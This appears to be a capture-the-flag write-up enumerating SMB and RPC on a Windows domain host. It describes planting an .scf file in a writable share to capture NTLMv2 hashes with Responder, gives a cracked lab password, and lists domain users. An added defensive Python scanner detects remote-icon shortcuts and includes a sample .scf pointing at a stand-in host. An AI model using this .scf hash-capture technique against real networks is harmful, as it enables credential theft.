SMB

PORT    STATE SERVICE       REASON          VERSION
445/tcp open  microsoft-ds? syn-ack ttl 127
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)

Host script results:
| smb-protocols: 
|   dialects: 
|     2.0.2
|     2.1
|     3.0
|     3.0.2
|_    3.1.1
|_smb-print-text: false
| smb2-time: 
|   date: 2022-08-11T15:35:38
|_  start_date: 2022-08-11T15:33:45
| smb2-capabilities: 
|   2.0.2: 
|     Distributed File System
|   2.1: 
|     Distributed File System
|     Leasing
|     Multi-credit operations
|   3.0: 
|     Distributed File System
|     Leasing
|     Multi-credit operations
|   3.0.2: 
|     Distributed File System
|     Leasing
|     Multi-credit operations
|   3.1.1: 
|     Distributed File System
|     Leasing
|_    Multi-credit operations
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb-mbenum: 
|_  ERROR: Failed to connect to browser service: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR

SMB NULL SHARES

Was able to get a list of other users who I might be able to roast.

Unfortunately for us, Kerberos isn't open to the public, which is why we were unable to execute ASREPRoast attacks.

However, after mounting the share we were able to see the users and the permissions to these folders.

Using the following script

Since we have write access to the Public folder, there are many ways that we could get a shell out of this; we could possibly steal hashes, as well as possibly putting files like an hta file.

After starting responder and placing the following .scf file I was able to capture NTLMv2 Hashes.
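
A defender-side check for the .scf technique described above, as an added example that is not part of the original writeup: it walks a share and reports shortcut-type files whose icon or target points at a remote host. The sample files, the 192.0.2.10 address and all function names are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Text-based shortcut types whose icon or target Windows Explorer may resolve.
SUSPECT_EXTENSIONS = {".scf", ".url"}
KEY_VALUE = re.compile(r"^\s*(IconFile|URL|WorkingDirectory)\s*=\s*(.+?)\s*$", re.I)
# A UNC path (\\host\...) or a file:// URL that names a remote host.
REMOTE_REF = re.compile(r"^(\\\\[^\\\s]+\\|file://[^/\s]+/)", re.I)


def read_text(path):
    """Decode a shortcut file, honouring a UTF-16 byte order mark if present."""
    raw = path.read_bytes()
    encoding = "utf-16" if raw[:2] in (b"\xff\xfe", b"\xfe\xff") else "utf-8"
    return raw.decode(encoding, errors="replace")


def scan_share(root):
    """Return (relative path, key, value) for each remote reference found."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SUSPECT_EXTENSIONS:
            continue
        for line in read_text(path).splitlines():
            m = KEY_VALUE.match(line)
            if m and REMOTE_REF.match(m.group(2)):
                rel = path.relative_to(root).as_posix()
                findings.append((rel, m.group(1), m.group(2)))
    return findings


def build_sample_share(root):
    """Constructed sample data: one benign shortcut, one with a remote icon."""
    public = Path(root) / "Public"
    public.mkdir()
    (public / "intranet.url").write_text(
        "[InternetShortcut]\nURL=https://intranet.example/\n"
        "IconFile=C:\\Windows\\System32\\url.dll\n")
    (public / "desktop.scf").write_text(
        "[Shell]\nIconFile=\\\\192.0.2.10\\share\\icon.ico\n")
    (public / "readme.txt").write_text("IconFile=\\\\192.0.2.10\\a\\b.ico\n")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_share(tmp)
        for rel, key, value in scan_share(tmp):
            print(f"{rel}: {key} -> {value}")
```

Run it on a schedule against any share that ordinary users can write to; a hit on a remote icon path is worth treating as an incident, since legitimate shortcuts rarely need one.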

Now we can try to enumerate again with these credentials and start all over. The password was Ashare1972.

We could have additional permissions to access other shares.

RPC

user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[amanda] rid:[0x450]
user:[mrlky] rid:[0x643]
user:[sizzler] rid:[0x644]
